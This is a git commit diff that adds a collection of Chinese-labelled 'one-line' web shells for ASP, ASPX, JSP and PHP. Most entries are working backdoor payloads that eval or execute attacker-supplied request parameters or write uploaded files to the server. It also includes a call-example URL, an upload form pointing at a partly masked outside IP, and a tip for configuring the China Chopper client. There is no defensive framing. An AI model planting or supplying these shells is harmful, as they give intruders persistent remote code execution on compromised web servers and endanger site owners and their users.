update

2024-11-10 05:44:11 +00:00 · 2013-09-06 08:38:12 +08:00 · 2013-09-06 08:38:12 +08:00 · 15cd7ad231
commit 15cd7ad231
parent e47c479d1e
4 changed files with 57 additions and 0 deletions
--- a/asp/ASP一句话.txt
+++ b/asp/ASP一句话.txt
@ -0,0 +1,27 @@
+[+]ASP一句话
+
+1) <%eval request("sb")%>
+2) <%execute request("sb")%>
+3) <%execute(request("sb"))%>
+4) <%execute request("sb")%><%'<% loop <%:%>
+5) <%'<% loop <%:%><%execute request("sb")%>
+6) <%execute request("sb")'<% loop <%:%>
+7) <script language=vbs runat=server>eval(request("sb"))
+8) %><%Eval(Request(chr(35)))%><%
+9) <%eval request("sb")%>
+10） <%eval_r(Request("0x001"))%>
+11） <%ExecuteGlobal request("sb")%>
+12） if Request("sb")<>"" then ExecuteGlobal request("sb") end if
+13） <%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
+     <%var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : 'o040'};lcx.性别((lcx.名字)+'');%>
+14） <%
+     Set o = Server.CreateObject("ScriptControl")
+     o.language = "vbscript"
+     o.addcode(Request("SubCode")) '参数SubCode作为过程代码
+     o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之，同时压入6个基对象作为参数
+     %>
+
+[+]调用示例：
+·程序代码
+	http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end
+	%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
--- a/aspx/ASPX一句话
+++ b/aspx/ASPX一句话
@ -0,0 +1,8 @@
+ASPX一句话
+
+1) <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
+2) <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
+　　//Jscript的asp.net一句话
+3) <%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])  ); }%>
+　　//C#的asp.net一句话
+4) <% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
--- a/jsp/JSP一句话
+++ b/jsp/JSP一句话
@ -0,0 +1,9 @@
+JSP一句话
+
+1) <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>
+
+　　提交客户端:
+　　<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
+　　<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
+　　<input type=submit value="提交">
+　　</form>
--- a/php/php一句话
+++ b/php/php一句话
@ -0,0 +1,13 @@
+[+]php一句话
+
+1) <?php eval($_POST[sb]);?>
+2) <?php @eval($_POST[sb]);?>
+3) <?php assert($_POST[sb]);?>
+4) <?$_POST['sa']($_POST['sb']);?>
+5) <?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
+6) <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
+　 //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
+　 <O>h=@eval($_POST[c]);</O>
+7) <script language="php">@eval($_POST[sb])</script>
+8) $filename=$_GET['xbid'];
+   include ($filename);